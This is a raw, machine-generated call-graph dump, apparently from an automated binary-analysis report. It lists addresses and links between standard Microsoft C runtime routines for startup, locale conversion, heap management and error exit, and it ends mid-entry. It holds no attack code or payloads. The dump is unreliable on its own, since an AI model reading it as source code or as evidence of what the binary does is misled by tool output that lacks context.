13558->13556 13559->13558 13562 1006293 13559->13562 13561->13557 13562->13558 13563 1004117 ___free_lconv_num 69 API calls 13562->13563 13564 10062a1 13563->13564 13564->13558 13566 1005f5a 13565->13566 13567 1005f8c 13565->13567 13566->13567 13568 1005e2e ___addlocaleref 8 API calls 13566->13568 13573 1005ffe 13567->13573 13569 1005f6d 13568->13569 13569->13567 13570 1005ebd ___removelocaleref 8 API calls 13569->13570 13571 1005f78 13570->13571 13571->13567 13572 1005ce5 ___freetlocinfo 69 API calls 13571->13572 13572->13567 13576 1005bd8 LeaveCriticalSection 13573->13576 13575 1006005 13575->13543 13576->13575 13580 1005bd8 LeaveCriticalSection 13577->13580 13579 10062d2 13579->13553 13580->13579 13582 1004545 _LocaleUpdate::_LocaleUpdate 79 API calls 13581->13582 13583 10098e5 13582->13583 13591 1009718 13583->13591 13586 1009d05 13587 1004545 _LocaleUpdate::_LocaleUpdate 79 API calls 13586->13587 13588 1009d18 13587->13588 13676 1009960 13588->13676 13592 1009764 13591->13592 13593 1009739 GetStringTypeW 13591->13593 13594 100984b 13592->13594 13595 1009751 13592->13595 13593->13595 13596 1009759 GetLastError 13593->13596 13619 100b152 GetLocaleInfoA 13594->13619 13597 100979d MultiByteToWideChar 13595->13597 13614 1009845 13595->13614 13596->13592 13603 10097ca 13597->13603 13597->13614 13600 1002b7c ___convertcp 5 API calls 13601 100613e 13600->13601 13601->13586 13602 100989c GetStringTypeA 13606 10098b7 13602->13606 13602->13614 13607 10097df _memset ___convertcp 13603->13607 13608 10077d2 _malloc 69 API calls 13603->13608 13605 1009818 MultiByteToWideChar 13610 100982e GetStringTypeW 13605->13610 13611 100983f 13605->13611 13612 1004117 ___free_lconv_num 69 API calls 13606->13612 13607->13605 13607->13614 13608->13607 13610->13611 13615 100961d 13611->13615 13612->13614 13614->13600 13616 1009629 13615->13616 13617 100963a 13615->13617 13616->13617 13618 1004117 ___free_lconv_num 69 API calls 13616->13618 13617->13614 13618->13617 13620 100b180 13619->13620 13621 100b185 13619->13621 13623 1002b7c ___convertcp 5 API calls 13620->13623 13650 100b13c 13621->13650 13624 100986f 13623->13624 13624->13602 13624->13614 13625 100b19b 13624->13625 13626 100b1db GetCPInfo 13625->13626 13630 100b265 13625->13630 13627 100b250 MultiByteToWideChar 13626->13627 13628 100b1f2 13626->13628 13627->13630 13635 100b20b _strlen 13627->13635 13628->13627 13631 100b1f8 GetCPInfo 13628->13631 13629 1002b7c ___convertcp 5 API calls 13633 1009890 13629->13633 13630->13629 13631->13627 13634 100b205 13631->13634 13632 100b23d _memset ___convertcp 13632->13630 13637 100b29a MultiByteToWideChar 13632->13637 13633->13602 13633->13614 13634->13627 13634->13635 13635->13632 13636 10077d2 _malloc 69 API calls 13635->13636 13636->13632 13638 100b2d1 13637->13638 13639 100b2b2 13637->13639 13640 100961d __freea 69 API calls 13638->13640 13641 100b2d6 13639->13641 13642 100b2b9 WideCharToMultiByte 13639->13642 13640->13630 13643 100b2e1 WideCharToMultiByte 13641->13643 13644 100b2f5 13641->13644 13642->13638 13643->13638 13643->13644 13645 10041ea __calloc_crt 69 API calls 13644->13645 13646 100b2fd 13645->13646 13646->13638 13647 100b306 WideCharToMultiByte 13646->13647 13647->13638 13648 100b318 13647->13648 13649 1004117 ___free_lconv_num 69 API calls 13648->13649 13649->13638 13653 100af79 13650->13653 13654 100af92 13653->13654 13657 100ad4a 13654->13657 13658 1004545 _LocaleUpdate::_LocaleUpdate 79 API calls 13657->13658 13660 100ad5f 13658->13660 13659 100ad71 13661 10040ce __free_osfhnd 69 API calls 13659->13661 13660->13659 13666 100adae 13660->13666 13662 100ad76 13661->13662 13663 10043bb __wctomb_s_l 7 API calls 13662->13663 13664 100ad86 13663->13664 13664->13620 13667 100adf3 13666->13667 13669 100b34f 13666->13669 13667->13664 13668 10040ce __free_osfhnd 69 API calls 13667->13668 13668->13664 13670 1004545 _LocaleUpdate::_LocaleUpdate 79 API calls 13669->13670 13671 100b363 13670->13671 13672 100b370 13671->13672 13673 1008bfc __isleadbyte_l 79 API calls 13671->13673 13672->13666 13674 100b398 13673->13674 13675 10098d2 ___crtGetStringTypeA 93 API calls 13674->13675 13675->13672 13677 1009981 LCMapStringW 13676->13677 13680 100999c 13676->13680 13678 10099a4 GetLastError 13677->13678 13677->13680 13678->13680 13679 1009b9a 13683 100b152 ___ansicp 93 API calls 13679->13683 13680->13679 13681 10099f6 13680->13681 13682 1009a0f MultiByteToWideChar 13681->13682 13705 1009b91 13681->13705 13692 1009a3c 13682->13692 13682->13705 13685 1009bc2 13683->13685 13684 1002b7c ___convertcp 5 API calls 13686 100615e 13684->13686 13687 1009cb6 LCMapStringA 13685->13687 13688 1009bdb 13685->13688 13685->13705 13686->13524 13689 1009c12 13687->13689 13690 100b19b ___convertcp 76 API calls 13688->13690 13693 1009cdd 13689->13693 13698 1004117 ___free_lconv_num 69 API calls 13689->13698 13695 1009bed 13690->13695 13691 1009a8d MultiByteToWideChar 13696 1009aa6 LCMapStringW 13691->13696 13697 1009b88 13691->13697 13694 10077d2 _malloc 69 API calls 13692->13694 13702 1009a55 ___convertcp 13692->13702 13704 1004117 ___free_lconv_num 69 API calls 13693->13704 13693->13705 13694->13702 13699 1009bf7 LCMapStringA 13695->13699 13695->13705 13696->13697 13701 1009ac7 13696->13701 13700 100961d __freea 69 API calls 13697->13700 13698->13693 13699->13689 13708 1009c19 13699->13708 13700->13705 13703 1009ad0 13701->13703 13707 1009af9 13701->13707 13702->13691 13702->13705 13703->13697 13706 1009ae2 LCMapStringW 13703->13706 13704->13705 13705->13684 13706->13697 13710 1009b14 ___convertcp 13707->13710 13712 10077d2 _malloc 69 API calls 13707->13712 13711 1009c2a _memset ___convertcp 13708->13711 13713 10077d2 _malloc 69 API calls 13708->13713 13709 1009b48 LCMapStringW 13714 1009b60 WideCharToMultiByte 13709->13714 13715 1009b82 13709->13715 13710->13697 13710->13709 13711->13689 13717 1009c68 LCMapStringA 13711->13717 13712->13710 13713->13711 13714->13715 13716 100961d __freea 69 API calls 13715->13716 13716->13697 13719 1009c84 13717->13719 13720 1009c88 13717->13720 13722 100961d __freea 69 API calls 13719->13722 13721 100b19b ___convertcp 76 API calls 13720->13721 13721->13719 13722->13689 13359 1005214 13360 1005250 13359->13360 13362 1005226 13359->13362 13362->13360 13363 100684c 13362->13363 13364 1006858 __ioinit 13363->13364 13365 1003568 __getptd 69 API calls 13364->13365 13366 100685d 13365->13366 13369 1009df6 13366->13369 13368 100687f __ioinit 13368->13360 13370 1009e15 13369->13370 13371 1009e1c 13369->13371 13373 1005264 __NMSG_WRITE 69 API calls 13370->13373 13381 10068eb 13371->13381 13373->13371 13376 1009f05 13405 1003cb3 13376->13405 13377 1009e2d _memset 13377->13376 13379 1009ec5 SetUnhandledExceptionFilter UnhandledExceptionFilter 13377->13379 13379->13376 13382 10032df __decode_pointer 7 API calls 13381->13382 13383 10068f6 13382->13383 13383->13377 13384 10068f8 13383->13384 13387 1006904 __ioinit 13384->13387 13385 1006960 13386 1006941 13385->13386 13391 100696f 13385->13391 13390 10032df __decode_pointer 7 API calls 13386->13390 13387->13385 13387->13386 13388 100692b 13387->13388 13392 1006927 13387->13392 13389 10034ef __getptd_noexit 69 API calls 13388->13389 13393 1006930 _siglookup 13389->13393 13390->13393 13394 10040ce __free_osfhnd 69 API calls 13391->13394 13392->13388 13392->13391 13396 10069d6 13393->13396 13398 1003cb3 _raise 69 API calls 13393->13398 13399 1006939 __ioinit 13393->13399 13395 1006974 13394->13395 13397 10043bb __wctomb_s_l 7 API calls 13395->13397 13400 1005cb2 __lock 69 API calls 13396->13400 13401 10069e1 13396->13401 13397->13399 13398->13396 13399->13377 13400->13401 13402 10032d6 __init_pointers 7 API calls 13401->13402 13403 1006a16 13401->13403 13402->13403 13408 1006a6c 13403->13408 13406 1003b71 _doexit 69 API calls 13405->13406 13407 1003cc4 RtlUnwind 13406->13407 13407->13368 13409 1006a72 13408->13409 13410 1006a79 13408->13410 13412 1005bd8 LeaveCriticalSection 13409->13412 13410->13399 13412->13410 14052 1006696 14055 1005bd8 LeaveCriticalSection 14052->14055 14054 100669d 14055->14054 9933 1002fd7 9968 1003e98 9933->9968 9935 1002fe3 GetStartupInfoW 9937 1003006 9935->9937 9969 1005a68 HeapCreate 9937->9969 9939 1003056 9971 100371f GetModuleHandleW 9939->9971 9943 1003067 __RTC_Initialize 10005 10057c8 9943->10005 9944 1002fac _fast_error_exit 69 API calls 9944->9943 9946 1003075 9947 1003081 GetCommandLineW 9946->9947 10060 1003a2d 9946->10060 10020 100576b GetEnvironmentStringsW 9947->10020 9951 1003090 10026 10056bd GetModuleFileNameW 9951->10026 9953 100309a 9954 10030a5 9953->9954 9955 1003a2d __amsg_exit 69 API calls 9953->9955 10030 100548e 9954->10030 9955->9954 9958 10030b6 10043 1003aec 9958->10043 9959 1003a2d __amsg_exit 69 API calls 9959->9958 9961 10030bd 9962 1003a2d __amsg_exit 69 API calls 9961->9962 9963 10030c8 __wwincmdln 9961->9963 9962->9963 9964 10030f7 9963->9964 10049 1003c9d 9963->10049 10067 1003cc9 9964->10067 9967 10030fc __ioinit 9968->9935 9970 100304a 9969->9970 9970->9939 10052 1002fac 9970->10052 9972 1003733 9971->9972 9973 100373a 9971->9973 10070 10039fd 9972->10070 9975 10038a2 9973->9975 9976 1003744 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 9973->9976 10134 10033cb 9975->10134 9978 100378d TlsAlloc 9976->9978 9981 100305c 9978->9981 9982 10037db TlsSetValue 9978->9982 9981->9943 9981->9944 9982->9981 9983 10037ec 9982->9983 10074 1003ce7 9983->10074 9988 1003264 __encode_pointer 7 API calls 9989 100380c 9988->9989 9990 1003264 __encode_pointer 7 API calls 9989->9990 9991 100381c 9990->9991 9992 1003264 __encode_pointer 7 API calls 9991->9992 9993 100382c 9992->9993 10093 1005b36 9993->10093 10000 10032df __decode_pointer 7 API calls 10001 1003880 10000->10001 10001->9975 10002 1003887 10001->10002 10115 1003408 10002->10115 10004 100388f GetCurrentThreadId 10004->9981 10468 1003e98 10005->10468 10007 10057d4 GetStartupInfoA 10008 10041ea __calloc_crt 69 API calls 10007->10008 10010 10057f5 10008->10010 10009 1005a13 __ioinit 10009->9946 10010->10009 10012 10041ea __calloc_crt 69 API calls 10010->10012 10018 100595a 10010->10018 10019 10058dd 10010->10019 10011 1005990 GetStdHandle 10011->10018 10012->10010 10013 10059f5 SetHandleCount 10013->10009 10014 10059a2 GetFileType 10014->10018 10015 1005906 GetFileType 10015->10019 10016 1006ad5 __ioinit InitializeCriticalSectionAndSpinCount 10016->10018 10017 1006ad5 __ioinit InitializeCriticalSectionAndSpinCount 10017->10019 10018->10009 10018->10011 10018->10013 10018->10014 10018->10016 10019->10009 10019->10015 10019->10017 10019->10018 10021 100577c 10020->10021 10022 1005780 10020->10022 10021->9951 10022->10022 10023 10041a5 __malloc_crt 69 API calls 10022->10023 10024 10057a1 _realloc 10023->10024 10025 10057a8 FreeEnvironmentStringsW 10024->10025 10025->9951 10027 10056f2 _wparse_cmdline 10026->10027 10028 10041a5 __malloc_crt 69 API calls 10027->10028 10029 1005735 _wparse_cmdline 10027->10029 10028->10029 10029->9953 10032 10054a6 _wcslen 10030->10032 10035 10030ab 10030->10035 10031 10041ea __calloc_crt 69 API calls 10038 10054ca _wcslen 10031->10038 10032->10031 10033 100552f 10034 1004117 ___free_lconv_num 69 API calls 10033->10034 10034->10035 10035->9958 10035->9959 10036 10041ea __calloc_crt 69 API calls 10036->10038 10037 1005555 10039 1004117 ___free_lconv_num 69 API calls 10037->10039 10038->10033 10038->10035 10038->10036 10038->10037 10041 1005514 10038->10041 10469 1002f3d 10038->10469 10039->10035 10041->10038 10042 1004293 __invoke_watson 10 API calls 10041->10042 10042->10041 10044 1003afa __IsNonwritableInCurrentImage 10043->10044 10478 100682b 10044->10478 10046 1003b18 __initterm_e 10048 1003b37 __IsNonwritableInCurrentImage __initterm 10046->10048 10482 1006814 10046->10482 10048->9961 10582 1003b71 10049->10582 10051 1003cae 10051->9964 10053 1002fba 10052->10053 10054 1002fbf 10052->10054 10055 100540f __FF_MSGBANNER 69 API calls 10053->10055 10056 1005264 __NMSG_WRITE 69 API calls 10054->10056 10055->10054 10057 1002fc7 10056->10057 10058 1003a81 _malloc 3 API calls 10057->10058 10059 1002fd1 10058->10059 10059->9939 10061 100540f __FF_MSGBANNER 69 API calls 10060->10061 10062 1003a37 10061->10062 10063 1005264 __NMSG_WRITE 69 API calls 10062->10063 10064 1003a3f 10063->10064 10065 10032df __decode_pointer 7 API calls 10064->10065 10066 1003080 10065->10066 10066->9947 10068 1003b71 _doexit 69 API calls 10067->10068 10069 1003cd4 10068->10069 10069->9967 10071 1003a08 Sleep GetModuleHandleW 10070->10071 10072 1003a26 10071->10072 10073 1003739 10071->10073 10072->10071 10072->10073 10073->9973 10145 10032d6 10074->10145 10076 1003cef __init_pointers __initp_misc_winsig 10148 1006885 10076->10148 10079 1003264 __encode_pointer 7 API calls 10080 10037f1 10079->10080 10081 1003264 TlsGetValue 10080->10081 10082 100327c 10081->10082 10083 100329d GetModuleHandleW 10081->10083 10082->10083 10084 1003286 TlsGetValue 10082->10084 10085 10032b8 GetProcAddress 10083->10085 10086 10032ad 10083->10086 10088 1003291 10084->10088 10092 1003295 10085->10092 10087 10039fd __crt_waiting_on_module_handle 2 API calls 10086->10087 10089 10032b3 10087->10089 10088->10083 10088->10092 10089->10085 10090 10032d0 10089->10090 10090->9988 10091 10032c8 RtlEncodePointer 10091->10090 10092->10090 10092->10091 10094 1005b41 10093->10094 10095 1003839 10094->10095 10151 1006ad5 10094->10151 10095->9975 10097 10032df TlsGetValue 10095->10097 10098 10032f7 10097->10098 10099 1003318 GetModuleHandleW 10097->10099 10098->10099 10100 1003301 TlsGetValue 10098->10100 10101 1003333 GetProcAddress 10099->10101 10102 1003328 10099->10102 10106 100330c 10100->10106 10108 1003310 10101->10108 10103 10039fd __crt_waiting_on_module_handle 2 API calls 10102->10103 10107 100332e 10103->10107 10104 1003343 RtlDecodePointer 10105 100334b 10104->10105 10105->9975 10109 10041ea 10105->10109 10106->10099 10106->10108 10107->10101 10107->10105 10108->10104 10108->10105 10110 10041f3 10109->10110 10112 1003866 10110->10112 10113 1004211 Sleep 10110->10113 10156 100789c 10110->10156 10112->9975 10112->10000 10114 1004226 10113->10114 10114->10110 10114->10112 10447 1003e98 10115->10447 10117 1003414 GetModuleHandleW 10118 1003424 10117->10118 10119 100342b 10117->10119 10120 10039fd __crt_waiting_on_module_handle 2 API calls 10118->10120 10121 1003442 GetProcAddress GetProcAddress 10119->10121 10122 1003466 10119->10122 10123 100342a 10120->10123 10121->10122 10124 1005cb2 __lock 65 API calls 10122->10124 10123->10119 10125 1003485 InterlockedIncrement 10124->10125 10448 10034dd 10125->10448 10128 1005cb2 __lock 65 API calls 10129 10034a6 10128->10129 10451 1005e2e InterlockedIncrement 10129->10451 10131 10034c4 10463 10034e6 10131->10463 10133 10034d1 __ioinit 10133->10004 10135 10033d5 10134->10135 10136 10033e1 10134->10136 10137 10032df __decode_pointer 7 API calls 10135->10137 10138 10033f5 TlsFree 10136->10138 10139 1003403 10136->10139 10137->10136 10138->10139 10140 1005b9d DeleteCriticalSection 10139->10140 10141 1005bb5 10139->10141 10142 1004117 ___free_lconv_num 69 API calls 10140->10142 10143 1005bc7 DeleteCriticalSection 10141->10143 10144 1005bd5 10141->10144 10142->10139 10143->10141 10144->9981 10146 1003264 __encode_pointer 7 API calls 10145->10146 10147 10032dd 10146->10147 10147->10076 10149 1003264 __encode_pointer 7 API calls 10148->10149 10150 1003d21 10149->10150 10150->10079 10155 1003e98 10151->10155 10153 1006ae1 InitializeCriticalSectionAndSpinCount 10154 1006b25 __ioinit 10153->10154 10154->10094 10155->10153 10157 10078a8 __ioinit 10156->10157 10158 10078c0 10157->10158 10168 10078df _memset 10157->10168 10169 10040ce 10158->10169 10162 1007951 RtlAllocateHeap 10162->10168 10163 10078d5 __ioinit 10163->10110 10168->10162 10168->10163 10175 1005cb2 10168->10175 10182 100749e 10168->10182 10188 1007998 10168->10188 10191 1006b44 10168->10191 10194 10034ef GetLastError 10169->10194 10171 10040d3 10172 10043bb 10171->10172 10173 10032df __decode_pointer 7 API calls 10172->10173 10174 10043cb __invoke_watson 10173->10174 10176 1005cc7 10175->10176 10177 1005cda EnterCriticalSection 10175->10177 10241 1005bef 10176->10241 10177->10168 10179 1005ccd 10179->10177 10180 1003a2d __amsg_exit 68 API calls 10179->10180 10181 1005cd9 10180->10181 10181->10177 10185 10074cc 10182->10185 10183 1007565 10187 100756e 10183->10187 10442 10070b5 10183->10442 10185->10183 10185->10187 10435 1007005 10185->10435 10187->10168 10446 1005bd8 LeaveCriticalSection 10188->10446 10190 100799f 10190->10168 10192 10032df __decode_pointer 7 API calls 10191->10192 10193 1006b54 10192->10193 10193->10168 10208 100337a TlsGetValue 10194->10208 10197 100355c SetLastError 10197->10171 10198 10041ea __calloc_crt 66 API calls 10199 100351a 10198->10199 10199->10197 10200 10032df __decode_pointer 7 API calls 10199->10200 10201 1003534 10200->10201 10202 1003553 10201->10202 10203 100353b 10201->10203 10213 1004117 10202->10213 10205 1003408 __getptd_noexit 66 API calls 10203->10205 10206 1003543 GetCurrentThreadId 10205->10206 10206->10197 10207 1003559 10207->10197 10209 10033aa 10208->10209 10210 100338f 10208->10210 10209->10197 10209->10198 10211 10032df __decode_pointer 7 API calls 10210->10211 10212 100339a TlsSetValue 10211->10212 10212->10209 10215 1004123 __ioinit 10213->10215 10214 100419c _realloc __ioinit 10214->10207 10215->10214 10217 1005cb2 __lock 67 API calls 10215->10217 10225 1004162 10215->10225 10216 1004177 HeapFree 10216->10214 10218 1004189 10216->10218 10222 100413a ___sbh_find_block 10217->10222 10219 10040ce __free_osfhnd 67 API calls 10218->10219 10220 100418e GetLastError 10219->10220 10220->10214 10221 1004154 10233 100416d 10221->10233 10222->10221 10226 1006cef 10222->10226 10225->10214 10225->10216 10227 1006d2e 10226->10227 10232 1006fd0 10226->10232 10228 1006f1a VirtualFree 10227->10228 10227->10232 10229 1006f7e 10228->10229 10230 1006f8d VirtualFree HeapFree 10229->10230 10229->10232 10236 100a050 10230->10236 10232->10221 10240 1005bd8 LeaveCriticalSection 10233->10240 10235 1004174 10235->10225 10237 100a068 10236->10237 10238 100a097 10237->10238 10239 100a08f __VEC_memcpy 10237->10239 10238->10232 10239->10238 10240->10235 10242 1005bfb __ioinit 10241->10242 10243 1005c21 10242->10243 10267 100540f 10242->10267 10249 1005c31 __ioinit 10243->10249 10313 10041a5 10243->10313 10249->10179 10251 1005c52 10253 1005cb2 __lock 69 API calls 10251->10253 10252 1005c43 10255 10040ce __free_osfhnd 69 API calls 10252->10255 10256 1005c59 10253->10256 10255->10249 10257 1005c61 10256->10257 10258 1005c8d 10256->10258 10259 1006ad5 __ioinit InitializeCriticalSectionAndSpinCount 10257->10259 10260 1004117 ___free_lconv_num 69 API calls 10258->10260 10261 1005c6c 10259->10261 10262 1005c7e 10260->10262 10261->10262 10263 1004117 ___free_lconv_num 69 API calls 10261->10263 10319 1005ca9 10262->10319 10265 1005c78 10263->10265 10266 10040ce __free_osfhnd 69 API calls 10265->10266 10266->10262 10322 1008fdf 10267->10322 10270 1008fdf __set_error_mode 69 API calls 10272 1005423 10270->10272 10271 1005264 __NMSG_WRITE 69 API calls 10273 100543b 10271->10273 10272->10271 10274 1005445 10272->10274 10275 1005264 __NMSG_WRITE 69 API calls 10273->10275 10276 1005264 10274->10276 10275->10274 10277 1005278 10276->10277 10278 10053d3 10277->10278 10279 1008fdf __set_error_mode 66 API calls 10277->10279 10310 1003a81 10278->10310 10280 100529a 10279->10280 10281 10053d8 GetStdHandle 10280->10281 10283 1008fdf __set_error_mode 66 API calls 10280->10283 10281->10278 10282 10053e6 _strlen 10281->10282 10282->10278 10286 10053ff WriteFile 10282->10286 10284 10052ab 10283->10284 10284->10281 10285 10052bd 10284->10285 10285->10278 10328 1008f77 10285->10328 10286->10278 10289 10052f3 GetModuleFileNameA 10290 1005311 10289->10290 10295 1005334 _strlen 10289->10295 10292 1008f77 _strcpy_s 66 API calls 10290->10292 10294 1005321 10292->10294 10294->10295 10297 1004293 __invoke_watson 10 API calls 10294->10297 10296 1005377 10295->10296 10344 1008ec2 10295->10344 10353 1008e4e 10296->10353 10297->10295 10301 100539b 10304 1008e4e _strcat_s 66 API calls 10301->10304 10303 1004293 __invoke_watson 10 API calls 10303->10301 10305 10053af 10304->10305 10307 10053c0 10305->10307 10308 1004293 __invoke_watson 10 API calls 10305->10308 10306 1004293 __invoke_watson 10 API calls 10306->10296 10362 1008ce5 10307->10362 10308->10307 10400 1003a56 GetModuleHandleW 10310->10400 10316 10041ae 10313->10316 10315 10041e4 10315->10251 10315->10252 10316->10315 10317 10041c5 Sleep 10316->10317 10404 10077d2 10316->10404 10318 10041da 10317->10318 10318->10315 10318->10316 10434 1005bd8 LeaveCriticalSection 10319->10434 10321 1005cb0 10321->10249 10323 1008fee 10322->10323 10324 10040ce __free_osfhnd 69 API calls 10323->10324 10325 1005416 10323->10325 10326 1009011 10324->10326 10325->10270 10325->10272 10327 10043bb __wctomb_s_l 7 API calls 10326->10327 10327->10325 10329 1008f88 10328->10329 10332 1008f8f 10328->10332 10329->10332 10335 1008fb5 10329->10335 10330 10040ce __free_osfhnd 69 API calls 10331 1008f94 10330->10331 10333 10043bb __wctomb_s_l 7 API calls 10331->10333 10332->10330 10334 10052df 10333->10334 10334->10289 10337 1004293 10334->10337 10335->10334 10336 10040ce __free_osfhnd 69 API calls 10335->10336 10336->10331 10389 1007be0 10337->10389 10339 10042c0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10340 100439c GetCurrentProcess TerminateProcess 10339->10340 10342 1004390 __invoke_watson 10339->10342 10391 1002b7c 10340->10391 10342->10340 10343 10043b9 10343->10289 10349 1008ed4 10344->10349 10345 1008ed8 10346 10040ce __free_osfhnd 69 API calls 10345->10346 10347 1005364 10345->10347 10348 1008ef4 10346->10348 10347->10296 10347->10306 10350 10043bb __wctomb_s_l 7 API calls 10348->10350 10349->10345 10349->10347 10351 1008f1e 10349->10351 10350->10347 10351->10347 10352 10040ce __free_osfhnd 69 API calls 10351->10352 10352->10348 10354 1008e66 10353->10354 10356 1008e5f 10353->10356 10355 10040ce __free_osfhnd 69 API calls 10354->10355 10361 1008e6b 10355->10361 10356->10354 10358 1008e9a 10356->10358 10357 10043bb __wctomb_s_l 7 API calls 10359 100538a 10357->10359 10358->10359 10360 10040ce __free_osfhnd 69 API calls 10358->10360 10359->10301 10359->10303 10360->10361 10361->10357 10363 10032d6 __init_pointers 7 API calls 10362->10363 10364 1008cf5 10363->10364 10365 1008d90 10364->10365 10366 1008d08 LoadLibraryA 10364->10366 10390 1007bec __VEC_memzero 10389->10390 10390->10339 10392 1002b84 10391->10392 10393 1002b86 IsDebuggerPresent 10391->10393 10392->10343 10399 1005b2e 10393->10399 10396 100322b SetUnhandledExceptionFilter UnhandledExceptionFilter 10397 1003250 GetCurrentProcess TerminateProcess 10396->10397 10398 1003248 __invoke_watson 10396->10398 10397->10343 10398->10397 10399->10396 10401 1003a6a GetProcAddress 10400->10401 10402 1003a7f ExitProcess 10400->10402 10401->10402 10403 1003a7a 10401->10403 10403->10402 10405 1007885 10404->10405 10411 10077e4 10404->10411 10406 1006b44 _malloc 7 API calls 10405->10406 10408 100788b 10406->10408 10407 10077f5 10409 100540f __FF_MSGBANNER 68 API calls 10407->10409 10407->10411 10413 1005264 __NMSG_WRITE 68 API calls 10407->10413 10415 1003a81 _malloc 3 API calls 10407->10415 10410 10040ce __free_osfhnd 68 API calls 10408->10410 10409->10407 10416 100787d 10410->10416 10411->10407 10414 1007841 RtlAllocateHeap 10411->10414 10411->10416 10417 1007871 10411->10417 10418 1006b44 _malloc 7 API calls 10411->10418 10420 1007876 10411->10420 10422 1007783 10411->10422 10413->10407 10414->10411 10415->10407 10416->10316 10419 10040ce __free_osfhnd 68 API calls 10417->10419 10418->10411 10419->10420 10421 10040ce __free_osfhnd 68 API calls 10420->10421 10421->10416 10423 100778f __ioinit 10422->10423 10424 10077c0 __ioinit 10423->10424 10425 1005cb2 __lock 69 API calls 10423->10425 10424->10411 10426 10077a5 10425->10426 10427 100749e ___sbh_alloc_block 5 API calls 10426->10427 10428 10077b0 10427->10428 10430 10077c9 10428->10430 10433 1005bd8 LeaveCriticalSection 10430->10433 10432 10077d0 10432->10424 10433->10432 10434->10321 10436 1007018 HeapReAlloc 10435->10436 10437 100704c HeapAlloc 10435->10437 10438 1007036 10436->10438 10439 100703a 10436->10439 10437->10438 10440 100706f VirtualAlloc 10437->10440 10438->10183 10439->10437 10440->10438 10441 1007089 HeapFree 10440->10441 10441->10438 10443 10070cc VirtualAlloc 10442->10443 10445 1007113 10443->10445 10445->10187 10446->10190 10447->10117 10466 1005bd8 LeaveCriticalSection 10448->10466 10450 100349f 10450->10128 10452 1005e4c InterlockedIncrement 10451->10452 10453 1005e4f 10451->10453 10452->10453 10454 1005e59 InterlockedIncrement 10453->10454 10455 1005e5c 10453->10455 10454->10455 10456 1005e66 InterlockedIncrement 10455->10456 10457 1005e69 10455->10457 10456->10457 10458 1005e73 InterlockedIncrement 10457->10458 10460 1005e76 10457->10460 10458->10460 10459 1005e8f InterlockedIncrement 10459->10460 10460->10459 10461 1005e9f InterlockedIncrement 10460->10461 10462 1005eaa InterlockedIncrement 10460->10462 10461->10460 10462->10131 10467 1005bd8 LeaveCriticalSection 10463->10467 10465 10034ed 10465->10133 10466->10450 10467->10465 10468->10007 10470 1002f55 10469->10470 10471 1002f4e 10469->10471 10472 10040ce __free_osfhnd 69 API calls 10470->10472 10471->10470 10476 1002f81 10471->10476 10473 1002f5a 10472->10473 10474 10043bb __wctomb_s_l 7 API calls 10473->10474 10475 1002f69 10474->10475 10475->10038 10476->10475 10477 10040ce __free_osfhnd 69 API calls 10476->10477 10477->10473 10479 1006831 10478->10479 10480 1003264 __encode_pointer 7 API calls 10479->10480 10481 1006849 10479->10481 10480->10479 10481->10046 10485 10067d8 10482->10485 10484 1006821 10484->10048 10486 10067e4 __ioinit 10485->10486 10493 1003a99 10486->10493 10492 1006805 __ioinit 10492->10484 10494 1005cb2 __lock 69 API calls 10493->10494 10495 1003aa0 10494->10495 10496 10066ed 10495->10496 10497 10032df __decode_pointer 7 API calls 10496->10497 10498 1006701 10497->10498 10499 10032df __decode_pointer 7 API calls 10498->10499 10500 1006711 10499->10500 10501 1006794 10500->10501 10516 1009d4a 10500->10516 10513 100680e 10501->10513 10503 1003264 __encode_pointer 7 API calls 10504 1006789 10503->10504 10507 1003264 __encode_pointer 7 API calls 10504->10507 10505 1006753 10505->10501 10509 1004236 __realloc_crt 75 API calls 10505->10509 10510 1006769 10505->10510 10506 100672f 10506->10505 10512 100677b 10506->10512 10529 1004236 10506->10529 10507->10501 10509->10510 10510->10501 10511 1003264 __encode_pointer 7 API calls 10510->10511 10511->10512 10512->10503 10578 1003aa2 10513->10578 10517 1009d56 __ioinit 10516->10517 10518 1009d83 10517->10518 10519 1009d66 10517->10519 10521 1009dc4 HeapSize 10518->10521 10523 1005cb2 __lock 69 API calls 10518->10523 10520 10040ce __free_osfhnd 69 API calls 10519->10520 10522 1009d6b 10520->10522 10525 1009d7b __ioinit 10521->10525 10524 10043bb __wctomb_s_l 7 API calls 10522->10524 10526 1009d93 ___sbh_find_block 10523->10526 10524->10525 10525->10506 10534 1009de4 10526->10534 10531 100423f 10529->10531 10532 100427e 10531->10532 10533 100425f Sleep 10531->10533 10538 10079ba 10531->10538 10532->10505 10533->10531 10537 1005bd8 LeaveCriticalSection 10534->10537 10536 1009dbf 10536->10521 10536->10525 10537->10536 10539 10079c6 __ioinit 10538->10539 10540 10079db 10539->10540 10541 10079cd 10539->10541 10543 10079e2 10540->10543 10544 10079ee 10540->10544 10542 10077d2 _malloc 69 API calls 10541->10542 10560 10079d5 _realloc __ioinit 10542->10560 10545 1004117 ___free_lconv_num 69 API calls 10543->10545 10550 1007b60 10544->10550 10566 10079fb ___sbh_resize_block _realloc ___sbh_find_block 10544->10566 10545->10560 10546 1007b93 10548 1006b44 _malloc 7 API calls 10546->10548 10547 1007b65 HeapReAlloc 10547->10550 10547->10560 10551 1007b99 10548->10551 10549 1005cb2 __lock 69 API calls 10549->10566 10550->10546 10550->10547 10552 1007bb7 10550->10552 10554 1006b44 _malloc 7 API calls 10550->10554 10556 1007bad 10550->10556 10553 10040ce __free_osfhnd 69 API calls 10551->10553 10555 10040ce __free_osfhnd 69 API calls 10552->10555 10552->10560 10553->10560 10554->10550 10557 1007bc0 GetLastError 10555->10557 10559 10040ce __free_osfhnd 69 API calls 10556->10559 10557->10560 10572 1007b2e 10559->10572 10560->10531 10561 1007a86 HeapAlloc 10561->10566 10562 1007b33 GetLastError 10562->10560 10563 1007adb HeapReAlloc 10563->10566 10564 100749e ___sbh_alloc_block 5 API calls 10564->10566 10565 1007b46 10565->10560 10568 10040ce __free_osfhnd 69 API calls 10565->10568 10566->10546 10566->10549 10566->10560 10566->10561 10566->10563 10566->10564 10566->10565 10567 1006b44 _malloc 7 API calls 10566->10567 10570 1007b29 10566->10570 10573 1006cef VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 10566->10573 10574 1007afe 10566->10574 10567->10566 10569 1007b53 10568->10569 10569->10557 10569->10560 10571 10040ce __free_osfhnd 69 API calls 10570->10571 10571->10572 10572->10560 10572->10562 10573->10566 10577 1005bd8 LeaveCriticalSection 10574->10577 10576 1007b05 10576->10566 10577->10576 10581 1005bd8 